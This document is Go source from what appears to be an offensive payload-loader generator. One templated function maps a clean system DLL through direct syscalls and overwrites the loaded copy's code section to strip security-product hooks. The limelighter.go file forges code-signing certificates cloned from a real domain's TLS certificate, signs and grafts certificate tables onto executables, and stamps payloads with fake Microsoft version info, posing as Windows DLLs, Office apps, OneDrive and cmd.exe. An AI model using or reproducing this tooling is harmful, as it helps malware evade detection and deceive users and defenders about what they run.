{{.Variables.ntPath}} 1079 | {{.Variables.objectAttributes}}.Length = uint32(unsafe.Sizeof(windows.OBJECT_ATTRIBUTES{})) 1080 | {{.Variables.Address}} := {{.Variables.FindAddress}}() 1081 | {{.Variables.NtOpenSection}} = 0x37 1082 | {{.Variables.ttttt}} := 0x0004 1083 | r, _ := [loader].[NtOpenSectionprep]( 1084 | {{.Variables.NtOpenSection}}, 1085 | {{.Variables.Address}}, 1086 | uintptr(unsafe.Pointer(&{{.Variables.KnownDll}})), 1087 | uintptr({{.Variables.ttttt}}), 1088 | uintptr(unsafe.Pointer(&{{.Variables.objectAttributes}})), 1089 | ) 1090 | if r != 0 { 1091 | } 1092 | {{.Variables.NtMapViewOfSection}} = 0x28 1093 | zero := 0 1094 | one := 1 1095 | [loader].[NtOpenSection]( 1096 | {{.Variables.NtMapViewOfSection}}, 1097 | {{.Variables.Address}}, 1098 | {{.Variables.KnownDll}}, 1099 | {{.Variables.handle}}, 1100 | uintptr(unsafe.Pointer(&{{.Variables.CleanSystemDLL}})), 1101 | uintptr(zero), 1102 | uintptr(zero), 1103 | uintptr(zero), 1104 | uintptr(unsafe.Pointer(&{{.Variables.sztViewSize}})), 1105 | uintptr(one), 1106 | uintptr(zero), 1107 | uintptr(syscall.PAGE_READONLY), 1108 | ) 1109 | {{.Variables.rawdata}} := rawreader.New({{.Variables.CleanSystemDLL}}, int({{.Variables.sztViewSize}})) 1110 | {{.Variables.file}}, _ := pe.NewFileFromMemory({{.Variables.rawdata}}) 1111 | {{.Variables.fullbytes}}, err := {{.Variables.file}}.Bytes() 1112 | if err != nil { 1113 | } 1114 | {{.Variables.x}} := {{.Variables.file}}.Section(string([]byte{'.', 't', 'e', 'x', 't'})) 1115 | {{.Variables.bytes}} := {{.Variables.fullbytes}}[{{.Variables.x}}.Offset:{{.Variables.x}}.Size] 1116 | {{.Variables.filee}}, error := filepe.Open(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\'}) + {{.Variables.DLL}} ) 1117 | if error != nil { 1118 | } 1119 | {{.Variables.xx}} := {{.Variables.filee}}.Section(".text") 1120 | {{.Variables.loaddlll}}, error := windows.LoadDLL(string([]byte{'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y', 's', 't', 'e', 'm', '3', '2', '\\'}) + {{.Variables.DLL}} ) 1121 | if error != nil { 1122 | } 1123 | {{.Variables.ddhandlez}} := {{.Variables.loaddlll}}.Handle 1124 | {{.Variables.dllBase}} := uintptr({{.Variables.ddhandlez}}) 1125 | {{.Variables.dllOffset}} := uint({{.Variables.dllBase}}) + uint({{.Variables.xx}}.VirtualAddress) 1126 | {{.Variables.mxKeSFQASvbvx}} = 0x50 1127 | {{.Variables.regionsize}} := uintptr(len({{.Variables.bytes}})) 1128 | var {{.Variables.oldfartcodeperms}} uintptr 1129 | 1130 | {{.Variables.runfunc}}, _ := [loader].[NtProtectVirtualMemoryJMPprep]( 1131 | {{.Variables.mxKeSFQASvbvx}}, 1132 | {{.Variables.Address}}, 1133 | {{.Variables.handle}}, 1134 | (*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})), 1135 | &{{.Variables.regionsize}}, 1136 | 0x40, 1137 | &{{.Variables.oldfartcodeperms}}, 1138 | ) 1139 | if {{.Variables.runfunc}} != 0 { 1140 | } 1141 | {{.Variables.WriteMemoryfunc}}({{.Variables.bytes}}, uintptr({{.Variables.dllOffset}})) 1142 | {{.Variables.filee}}.Close() 1143 | {{.Variables.runfunc}}, _ = [loader].[NtProtectVirtualMemoryJMPprep]( 1144 | {{.Variables.mxKeSFQASvbvx}}, 1145 | {{.Variables.Address}}, 1146 | {{.Variables.handle}}, 1147 | (*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})), 1148 | &{{.Variables.regionsize}}, 1149 | 0x20, 1150 | &{{.Variables.oldfartcodeperms}}, 1151 | ) 1152 | if {{.Variables.runfunc}} != 0 { 1153 | } 1154 | syscall.Syscall(uintptr(procNtUnmapViewOfSection.Addr()), 2, uintptr({{.Variables.handle}}), {{.Variables.CleanSystemDLL}}, 0) 1155 | return {{.Variables.bytes}} 1156 | } 1157 | 1158 | 1159 | func {{.Variables.WriteMemoryfunc}}({{.Variables.inbuf}} []byte, {{.Variables.destination}} uintptr) { 1160 | for {{.Variables.index}} := uint32(0); {{.Variables.index}} < uint32(len({{.Variables.inbuf}})); {{.Variables.index}}++ { 1161 | {{.Variables.writePtr}} := unsafe.Pointer({{.Variables.destination}} + uintptr({{.Variables.index}})) 1162 | {{.Variables.v}} := (*byte)({{.Variables.writePtr}}) 1163 | *{{.Variables.v}} = {{.Variables.inbuf}}[{{.Variables.index}}] 1164 | } 1165 | } 1166 | 1167 | ` 1168 | } 1169 | -------------------------------------------------------------------------------- /limelighter/limelighter.go: -------------------------------------------------------------------------------- 1 | package limelighter 2 | 3 | import ( 4 | "bytes" 5 | "crypto/rand" 6 | "crypto/rsa" 7 | "crypto/tls" 8 | "crypto/x509" 9 | "crypto/x509/pkix" 10 | "encoding/pem" 11 | "fmt" 12 | "io" 13 | "io/ioutil" 14 | "log" 15 | crand "math/rand" 16 | "os" 17 | "os/exec" 18 | "strings" 19 | "time" 20 | 21 | "github.com/Binject/debug/pe" 22 | "github.com/josephspurrier/goversioninfo" 23 | ) 24 | 25 | const letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890" 26 | 27 | func VarNumberLength(min, max int) string { 28 | var r string 29 | crand.Seed(time.Now().UnixNano()) 30 | num := crand.Intn(max-min) + min 31 | n := num 32 | r = RandStringBytes(n) 33 | return r 34 | } 35 | func RandStringBytes(n int) string { 36 | b := make([]byte, n) 37 | for i := range b { 38 | b[i] = letters[crand.Intn(len(letters))] 39 | 40 | } 41 | return string(b) 42 | } 43 | 44 | func GenerateCert(domain string, inputFile string) { 45 | var err error 46 | rootKey, err := rsa.GenerateKey(rand.Reader, 4096) 47 | if err != nil { 48 | panic(err) 49 | } 50 | certs, err := GetCertificatesPEM(domain + ":443") 51 | if err != nil { 52 | os.Chdir("..") 53 | foldername := strings.Split(inputFile, ".") 54 | os.RemoveAll(foldername[0]) 55 | log.Fatal("Error: The domain: " + domain + " does not exist or is not accessible from the host you are compiling on") 56 | } 57 | block, _ := pem.Decode([]byte(certs)) 58 | cert, _ := x509.ParseCertificate(block.Bytes) 59 | 60 | keyToFile(domain+".key", rootKey) 61 | 62 | SubjectTemplate := x509.Certificate{ 63 | SerialNumber: cert.SerialNumber, 64 | Subject: pkix.Name{ 65 | CommonName: cert.Subject.CommonName, 66 | }, 67 | NotBefore: cert.NotBefore, 68 | NotAfter: cert.NotAfter, 69 | BasicConstraintsValid: true, 70 | IsCA: true, 71 | KeyUsage: x509.KeyUsageDigitalSignature | x509.KeyUsageCertSign, 72 | ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth, x509.ExtKeyUsageClientAuth}, 73 | } 74 | IssuerTemplate := x509.Certificate{ 75 | SerialNumber: cert.SerialNumber, 76 | Subject: pkix.Name{ 77 | CommonName: cert.Issuer.CommonName, 78 | }, 79 | NotBefore: cert.NotBefore, 80 | NotAfter: cert.NotAfter, 81 | } 82 | derBytes, err := x509.CreateCertificate(rand.Reader, &SubjectTemplate, &IssuerTemplate, &rootKey.PublicKey, rootKey) 83 | if err != nil { 84 | panic(err) 85 | } 86 | certToFile(domain+".pem", derBytes) 87 | 88 | } 89 | 90 | func keyToFile(filename string, key *rsa.PrivateKey) { 91 | file, err := os.Create(filename) 92 | if err != nil { 93 | panic(err) 94 | } 95 | defer file.Close() 96 | b, err := x509.MarshalPKCS8PrivateKey(key) 97 | if err != nil { 98 | fmt.Fprintf(os.Stderr, "Unable to marshal RSA private key: %v", err) 99 | os.Exit(2) 100 | } 101 | if err := pem.Encode(file, &pem.Block{Type: "RSA PRIVATE KEY", Bytes: b}); err != nil { 102 | panic(err) 103 | } 104 | } 105 | 106 | func certToFile(filename string, derBytes []byte) { 107 | certOut, err := os.Create(filename) 108 | if err != nil { 109 | log.Fatalf("[-] Failed to Open cert.pem for Writing: %s", err) 110 | } 111 | if err := pem.Encode(certOut, &pem.Block{Type: "CERTIFICATE", Bytes: derBytes}); err != nil { 112 | log.Fatalf("[-] Failed to Write Data to cert.pem: %s", err) 113 | } 114 | if err := certOut.Close(); err != nil { 115 | log.Fatalf("[-] Error Closing cert.pem: %s", err) 116 | } 117 | } 118 | 119 | func GetCertificatesPEM(address string) (string, error) { 120 | conn, err := tls.Dial("tcp", address, &tls.Config{ 121 | InsecureSkipVerify: true, 122 | }) 123 | if err != nil { 124 | return "", err 125 | } 126 | defer conn.Close() 127 | var b bytes.Buffer 128 | for _, cert := range conn.ConnectionState().PeerCertificates { 129 | err := pem.Encode(&b, &pem.Block{ 130 | Type: "CERTIFICATE", 131 | Bytes: cert.Raw, 132 | }) 133 | if err != nil { 134 | return "", err 135 | } 136 | } 137 | return b.String(), nil 138 | } 139 | 140 | func GeneratePFK(password string, domain string) { 141 | cmd := exec.Command("openssl", "pkcs12", "-export", "-out", domain+".pfx", "-inkey", domain+".key", "-in", domain+".pem", "-passin", "pass:"+password+"", "-passout", "pass:"+password+"") 142 | err := cmd.Run() 143 | if err != nil { 144 | log.Fatalf("cmd.Run() failed with %s\n", err) 145 | } 146 | } 147 | 148 | func SignExecutable(password string, pfx string, filein string, fileout string) { 149 | cmd := exec.Command("osslsigncode", "sign", "-pkcs12", pfx, "-in", ""+filein+"", "-out", ""+fileout+"", "-pass", ""+password+"") 150 | err := cmd.Run() 151 | if err != nil { 152 | log.Fatalf("cmd.Run() failed with %s\n", err) 153 | } 154 | } 155 | 156 | func Cloner(CompiledLoader, FiletoClone string) { 157 | Clonefile, err := ioutil.ReadFile(CompiledLoader) 158 | if err != nil { 159 | log.Fatalf("Error: %s", err) 160 | } 161 | LoaderFile, err := ioutil.ReadFile(CompiledLoader) 162 | if err != nil { 163 | log.Fatalf("Error: %s", err) 164 | } 165 | signedFileReader := bytes.NewReader(Clonefile) 166 | signedPEFile, err := pe.NewFile(signedFileReader) 167 | if err != nil { 168 | 169 | } 170 | 171 | targetFileReader := bytes.NewReader(LoaderFile) 172 | targetPEFile, err := pe.NewFile(targetFileReader) 173 | if err != nil { 174 | 175 | } 176 | 177 | targetPEFile.CertificateTable = signedPEFile.CertificateTable 178 | Data, err := targetPEFile.Bytes() 179 | if err != nil { 180 | } 181 | ioutil.WriteFile(CompiledLoader, Data, 0777) 182 | } 183 | 184 | func FileProperties(name string, configFile string) string { 185 | fmt.Println("[*] Creating an Embedded Resource File") 186 | vi := &goversioninfo.VersionInfo{} 187 | if configFile != "" { 188 | var err error 189 | input := io.ReadCloser(os.Stdin) 190 | if input, err = os.Open("../" + configFile); err != nil { 191 | log.Printf("Cannot open %q: %v", configFile, err) 192 | os.Exit(3) 193 | } 194 | jsonBytes, err := ioutil.ReadAll(input) 195 | input.Close() 196 | if err != nil { 197 | log.Printf("Error reading %q: %v", configFile, err) 198 | os.Exit(3) 199 | } 200 | if err := vi.ParseJSON(jsonBytes); err != nil { 201 | log.Printf("Could not parse the .json file: %v", err) 202 | os.Exit(3) 203 | } 204 | name = vi.StringFileInfo.InternalName 205 | } else if configFile == "" { 206 | if name == "APMon" { 207 | vi.StringFileInfo.InternalName = "APMon.dll.mui" 208 | vi.StringFileInfo.FileDescription = "Adaptive Port Monitor" 209 | vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800)" 210 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 211 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\APMon.dll" 212 | vi.FixedFileInfo.ProductVersion.Patch = 19041 213 | vi.FixedFileInfo.ProductVersion.Major = 10 214 | vi.FixedFileInfo.ProductVersion.Minor = 0 215 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 216 | vi.StringFileInfo.ProductVersion = "10.0.19041.1" 217 | vi.FixedFileInfo.FileVersion.Major = 1 218 | vi.FixedFileInfo.FileVersion.Minor = 0 219 | vi.FixedFileInfo.FileVersion.Patch = 19041 220 | vi.FixedFileInfo.FileVersion.Build = 1 221 | vi.StringFileInfo.InternalName = "APMon.dll.mui" 222 | } 223 | if name == "bisr" { 224 | vi.StringFileInfo.InternalName = "bisrv.dll.mui" 225 | vi.StringFileInfo.FileDescription = "Background Tasks Infrastructure Service" 226 | vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800)" 227 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 228 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\bisrv.dll" 229 | vi.FixedFileInfo.ProductVersion.Patch = 19041 230 | vi.FixedFileInfo.ProductVersion.Major = 10 231 | vi.FixedFileInfo.ProductVersion.Minor = 0 232 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 233 | vi.StringFileInfo.ProductVersion = "10.0.19041.1" 234 | vi.FixedFileInfo.FileVersion.Major = 1 235 | vi.FixedFileInfo.FileVersion.Minor = 0 236 | vi.FixedFileInfo.FileVersion.Patch = 19041 237 | vi.FixedFileInfo.FileVersion.Build = 1 238 | vi.StringFileInfo.InternalName = "bisrv.dll.mui" 239 | } 240 | if name == "btpanui" { 241 | vi.StringFileInfo.InternalName = "btpanui.dll.mui" 242 | vi.StringFileInfo.FileDescription = "Bluetooth PAN User Interface" 243 | vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800" 244 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 245 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\btpanui.dll" 246 | vi.FixedFileInfo.ProductVersion.Patch = 19041 247 | vi.FixedFileInfo.ProductVersion.Major = 10 248 | vi.FixedFileInfo.ProductVersion.Minor = 0 249 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 250 | vi.StringFileInfo.ProductVersion = "10.0.19041.1" 251 | vi.FixedFileInfo.FileVersion.Major = 1 252 | vi.FixedFileInfo.FileVersion.Minor = 0 253 | vi.FixedFileInfo.FileVersion.Patch = 19041 254 | vi.FixedFileInfo.FileVersion.Build = 1 255 | vi.StringFileInfo.InternalName = "btpanui.dll.mui" 256 | } 257 | if name == "certcli" { 258 | vi.StringFileInfo.InternalName = "CertCli" 259 | vi.StringFileInfo.FileDescription = "Microsoft® Active Directory Certificate Services Client" 260 | vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800)" 261 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 262 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\certcli.dll" 263 | vi.FixedFileInfo.ProductVersion.Patch = 19041 264 | vi.FixedFileInfo.ProductVersion.Major = 10 265 | vi.FixedFileInfo.ProductVersion.Minor = 0 266 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 267 | vi.StringFileInfo.ProductVersion = "10.0.19041.1" 268 | vi.FixedFileInfo.FileVersion.Major = 1 269 | vi.FixedFileInfo.FileVersion.Minor = 0 270 | vi.FixedFileInfo.FileVersion.Patch = 19041 271 | vi.FixedFileInfo.FileVersion.Build = 1 272 | vi.StringFileInfo.InternalName = "CertCli" 273 | } 274 | if name == "cmdext" { 275 | vi.StringFileInfo.InternalName = "CmdExt.DLL" 276 | vi.StringFileInfo.FileDescription = "cmd.exe Extension DLL" 277 | vi.StringFileInfo.FileVersion = "10.0.19041.1023 (WinBuild.160101.0800)" 278 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 279 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\cmdext.dll" 280 | vi.FixedFileInfo.ProductVersion.Patch = 19041 281 | vi.FixedFileInfo.ProductVersion.Major = 10 282 | vi.FixedFileInfo.ProductVersion.Minor = 0 283 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 284 | vi.StringFileInfo.ProductVersion = "10.0.19041.1023" 285 | vi.FixedFileInfo.FileVersion.Major = 1 286 | vi.FixedFileInfo.FileVersion.Minor = 0 287 | vi.FixedFileInfo.FileVersion.Patch = 19041 288 | vi.FixedFileInfo.FileVersion.Build = 1023 289 | vi.StringFileInfo.InternalName = "CmdExt.DLL" 290 | } 291 | if name == "httpapi" { 292 | vi.StringFileInfo.InternalName = "httpapi.dll.mui" 293 | vi.StringFileInfo.FileDescription = "HTTP Protocol Stack API" 294 | vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800)" 295 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 296 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\httpapi.dll" 297 | vi.FixedFileInfo.ProductVersion.Patch = 19041 298 | vi.FixedFileInfo.ProductVersion.Major = 10 299 | vi.FixedFileInfo.ProductVersion.Minor = 0 300 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 301 | vi.StringFileInfo.ProductVersion = "10.0.19041.1" 302 | vi.FixedFileInfo.FileVersion.Major = 1 303 | vi.FixedFileInfo.FileVersion.Minor = 0 304 | vi.FixedFileInfo.FileVersion.Patch = 19041 305 | vi.FixedFileInfo.FileVersion.Build = 1 306 | vi.StringFileInfo.InternalName = "httpapi.dll.mui" 307 | } 308 | if name == "logoncli" { 309 | vi.StringFileInfo.InternalName = "LOGONCLI.DLL" 310 | vi.StringFileInfo.FileDescription = "Net Logon Client DLL" 311 | vi.StringFileInfo.FileVersion = "10.0.18362.1237 (WinBuild.160101.0800)" 312 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 313 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\logoncli.dll" 314 | vi.FixedFileInfo.ProductVersion.Patch = 18362 315 | vi.FixedFileInfo.ProductVersion.Major = 10 316 | vi.FixedFileInfo.ProductVersion.Minor = 0 317 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 318 | vi.StringFileInfo.ProductVersion = "10.0.18362.1237" 319 | vi.FixedFileInfo.FileVersion.Major = 1 320 | vi.FixedFileInfo.FileVersion.Minor = 0 321 | vi.FixedFileInfo.FileVersion.Patch = 18362 322 | vi.FixedFileInfo.FileVersion.Build = 1237 323 | vi.StringFileInfo.InternalName = "LOGONCLI.DLL" 324 | } 325 | if name == "netlogon" { 326 | vi.StringFileInfo.InternalName = "NetLogon.DLL.MUI" 327 | vi.StringFileInfo.FileDescription = "Net Logon Services DLL" 328 | vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800)" 329 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 330 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\netlogon.dll" 331 | vi.FixedFileInfo.ProductVersion.Patch = 19041 332 | vi.FixedFileInfo.ProductVersion.Major = 10 333 | vi.FixedFileInfo.ProductVersion.Minor = 0 334 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 335 | vi.StringFileInfo.ProductVersion = "10.0.19041.1" 336 | vi.FixedFileInfo.FileVersion.Major = 1 337 | vi.FixedFileInfo.FileVersion.Minor = 0 338 | vi.FixedFileInfo.FileVersion.Patch = 19041 339 | vi.FixedFileInfo.FileVersion.Build = 1 340 | vi.StringFileInfo.InternalName = "NetLogon.DLL.MUI" 341 | } 342 | if name == "tcpmon" { 343 | vi.StringFileInfo.InternalName = "tcpmon.dll.mui" 344 | vi.StringFileInfo.FileDescription = "Standard TCP/IP Port Monitor DLL" 345 | vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800)" 346 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 347 | vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\tcpmon.dll" 348 | vi.FixedFileInfo.ProductVersion.Patch = 19041 349 | vi.FixedFileInfo.ProductVersion.Major = 10 350 | vi.FixedFileInfo.ProductVersion.Minor = 0 351 | vi.StringFileInfo.ProductName = "Microsoft Corporation" 352 | vi.StringFileInfo.ProductVersion = "10.0.19041.1" 353 | vi.FixedFileInfo.FileVersion.Major = 1 354 | vi.FixedFileInfo.FileVersion.Minor = 0 355 | vi.FixedFileInfo.FileVersion.Patch = 19041 356 | vi.FixedFileInfo.FileVersion.Build = 1 357 | vi.StringFileInfo.InternalName = "tcpmon.dll.mui" 358 | } 359 | if name == "OneNote" { 360 | vi.IconPath = "onenote.ico" 361 | vi.StringFileInfo.InternalName = "OneNote" 362 | vi.StringFileInfo.FileDescription = "Microsoft OneNote" 363 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 364 | vi.StringFileInfo.FileVersion = "16.0.14326.20404" 365 | vi.StringFileInfo.OriginalFilename = "OneNote.exe" 366 | vi.StringFileInfo.ProductName = "Microsoft OneNote" 367 | vi.StringFileInfo.ProductVersion = "16.0.14326.20404" 368 | vi.FixedFileInfo.FileVersion.Major = 16 369 | vi.FixedFileInfo.FileVersion.Minor = 0 370 | vi.FixedFileInfo.FileVersion.Patch = 14326 371 | vi.FixedFileInfo.FileVersion.Build = 20404 372 | vi.StringFileInfo.InternalName = "OneNote" 373 | } 374 | if name == "Excel" { 375 | vi.IconPath = "excel.ico" 376 | vi.StringFileInfo.InternalName = "Excel" 377 | vi.StringFileInfo.FileDescription = "Microsoft Excel" 378 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 379 | vi.StringFileInfo.FileVersion = "16.0.14326.20404" 380 | vi.StringFileInfo.OriginalFilename = "Excel.exe" 381 | vi.StringFileInfo.ProductName = "Microsoft Office" 382 | vi.StringFileInfo.ProductVersion = "16.0.14326.20404" 383 | vi.FixedFileInfo.FileVersion.Major = 16 384 | vi.FixedFileInfo.FileVersion.Minor = 0 385 | vi.FixedFileInfo.FileVersion.Patch = 14326 386 | vi.FixedFileInfo.FileVersion.Build = 20838 387 | vi.StringFileInfo.InternalName = "Excel" 388 | } 389 | if name == "Word" { 390 | vi.IconPath = "word.ico" 391 | vi.StringFileInfo.InternalName = "Word" 392 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 393 | vi.StringFileInfo.FileVersion = "16.0.14326.20404" 394 | vi.StringFileInfo.OriginalFilename = "Word.exe" 395 | vi.StringFileInfo.ProductName = "Microsoft Office" 396 | vi.StringFileInfo.ProductVersion = "16.0.14326.20404" 397 | vi.FixedFileInfo.FileVersion.Major = 16 398 | vi.FixedFileInfo.FileVersion.Minor = 0 399 | vi.FixedFileInfo.FileVersion.Patch = 14326 400 | vi.FixedFileInfo.FileVersion.Build = 20404 401 | vi.StringFileInfo.InternalName = "Word" 402 | } 403 | if name == "Powerpnt" { 404 | vi.IconPath = "powerpoint.ico" 405 | vi.StringFileInfo.FileDescription = "Microsoft PowerPoint" 406 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 407 | vi.StringFileInfo.FileVersion = "16.0.14326.20404" 408 | vi.StringFileInfo.OriginalFilename = "Powerpnt.exe" 409 | vi.StringFileInfo.ProductName = "Microsoft Office" 410 | vi.StringFileInfo.ProductVersion = "16.0.14326.20404" 411 | vi.FixedFileInfo.FileVersion.Major = 16 412 | vi.FixedFileInfo.FileVersion.Minor = 0 413 | vi.FixedFileInfo.FileVersion.Patch = 14326 414 | vi.FixedFileInfo.FileVersion.Build = 20404 415 | vi.StringFileInfo.InternalName = "Powerpnt" 416 | } 417 | if name == "Outlook" { 418 | vi.IconPath = "outlook.ico" 419 | vi.StringFileInfo.InternalName = "Outlook.exe" 420 | vi.StringFileInfo.FileDescription = "Microsoft Outlook" 421 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 422 | vi.StringFileInfo.FileVersion = "16.0.14326.20404" 423 | vi.StringFileInfo.OriginalFilename = "Outlook.exe" 424 | vi.StringFileInfo.ProductName = "Microsoft Office" 425 | vi.StringFileInfo.ProductVersion = "16.0.14326.20404" 426 | vi.FixedFileInfo.FileVersion.Major = 16 427 | vi.FixedFileInfo.FileVersion.Minor = 0 428 | vi.FixedFileInfo.FileVersion.Patch = 14326 429 | vi.FixedFileInfo.FileVersion.Build = 20404 430 | vi.FixedFileInfo.ProductVersion.Patch = 14326 431 | vi.FixedFileInfo.ProductVersion.Major = 16 432 | vi.FixedFileInfo.ProductVersion.Minor = 0 433 | vi.StringFileInfo.InternalName = "Outlook.exe" 434 | } 435 | if name == "lync" { 436 | vi.IconPath = "lync.ico" 437 | vi.StringFileInfo.InternalName = "Lync" 438 | vi.StringFileInfo.FileDescription = "Skype for Business" 439 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 440 | vi.StringFileInfo.FileVersion = "16.0.14326.20404" 441 | vi.StringFileInfo.OriginalFilename = "Lync.exe" 442 | vi.StringFileInfo.ProductName = "Microsoft Office" 443 | vi.StringFileInfo.ProductVersion = "16.0.14326.20404" 444 | vi.FixedFileInfo.FileVersion.Major = 16 445 | vi.FixedFileInfo.FileVersion.Minor = 0 446 | vi.FixedFileInfo.FileVersion.Patch = 14326 447 | vi.FixedFileInfo.FileVersion.Build = 20404 448 | vi.StringFileInfo.InternalName = "Lync" 449 | } 450 | if name == "cmd" { 451 | vi.IconPath = "cmd.ico" 452 | vi.StringFileInfo.InternalName = "Cmd.exe" 453 | vi.StringFileInfo.FileDescription = "Windows Command Processor" 454 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 455 | vi.StringFileInfo.FileVersion = "10.0.19041.1 (WinBuild.160101.0800)" 456 | vi.StringFileInfo.OriginalFilename = "Cmd.exe" 457 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 458 | vi.StringFileInfo.ProductVersion = "10.0.19041.1" 459 | vi.FixedFileInfo.FileVersion.Major = 10 460 | vi.FixedFileInfo.FileVersion.Minor = 0 461 | vi.FixedFileInfo.FileVersion.Patch = 1 462 | vi.FixedFileInfo.FileVersion.Build = 19041 463 | vi.StringFileInfo.InternalName = "Cmd.exe" 464 | } 465 | if name == "OneDrive" { 466 | vi.IconPath = "onedrive.ico" 467 | vi.StringFileInfo.InternalName = "OneDrive.exe" 468 | vi.StringFileInfo.FileDescription = "Microsoft OneDrive" 469 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 470 | vi.StringFileInfo.FileVersion = "21.170.0822.0002" 471 | vi.StringFileInfo.OriginalFilename = "OneDrive.exe" 472 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 473 | vi.StringFileInfo.ProductVersion = "21.170.0822.0002" 474 | vi.FixedFileInfo.FileVersion.Major = 21 475 | vi.FixedFileInfo.FileVersion.Minor = 170 476 | vi.FixedFileInfo.FileVersion.Patch = 2 477 | vi.FixedFileInfo.FileVersion.Build = 822 478 | vi.StringFileInfo.InternalName = "OneDrive.exe" 479 | } 480 | if name == "apphelp" { 481 | vi.StringFileInfo.InternalName = "Apphelp" 482 | vi.StringFileInfo.FileDescription = "Application Compatibility Client Library" 483 | vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)" 484 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 485 | vi.StringFileInfo.LegalTrademarks = "" 486 | vi.FixedFileInfo.ProductVersion.Patch = 18362 487 | vi.FixedFileInfo.ProductVersion.Major = 10 488 | vi.FixedFileInfo.ProductVersion.Minor = 0 489 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 490 | vi.StringFileInfo.ProductVersion = "10.0.18362.1" 491 | vi.FixedFileInfo.FileVersion.Major = 10 492 | vi.FixedFileInfo.FileVersion.Minor = 0 493 | vi.FixedFileInfo.FileVersion.Patch = 18362 494 | vi.FixedFileInfo.FileVersion.Build = 1 495 | vi.StringFileInfo.OriginalFilename = "Apphelp.dll" 496 | } 497 | if name == "bcryptprimitives" { 498 | vi.StringFileInfo.InternalName = "bcryptprimitives.dll" 499 | vi.StringFileInfo.FileDescription = "Windows Cryptographic Primitives Library" 500 | vi.StringFileInfo.FileVersion = "10.0.18362.836 (WinBuild.160101.0800)" 501 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 502 | vi.StringFileInfo.LegalTrademarks = "" 503 | vi.FixedFileInfo.ProductVersion.Patch = 18362 504 | vi.FixedFileInfo.ProductVersion.Major = 10 505 | vi.FixedFileInfo.ProductVersion.Minor = 0 506 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 507 | vi.StringFileInfo.ProductVersion = "10.0.18362.836" 508 | vi.FixedFileInfo.FileVersion.Major = 10 509 | vi.FixedFileInfo.FileVersion.Minor = 0 510 | vi.FixedFileInfo.FileVersion.Patch = 18362 511 | vi.FixedFileInfo.FileVersion.Build = 836 512 | vi.StringFileInfo.OriginalFilename = "bcryptprimitives.dll" 513 | } 514 | if name == "cfgmgr32" { 515 | vi.StringFileInfo.InternalName = "cfgmgr32.dll" 516 | vi.StringFileInfo.FileDescription = "Configuration Manager DLL" 517 | vi.StringFileInfo.FileVersion = "10.0.18362.387 (WinBuild.160101.0800)" 518 | vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved." 519 | vi.StringFileInfo.LegalTrademarks = "" 520 | vi.FixedFileInfo.ProductVersion.Patch = 18362 521 | vi.FixedFileInfo.ProductVersion.Major = 10 522 | vi.FixedFileInfo.ProductVersion.Minor = 0 523 | vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System" 524 | vi.StringFileInfo.ProductVersion = "10.0.18362.387" 525 | 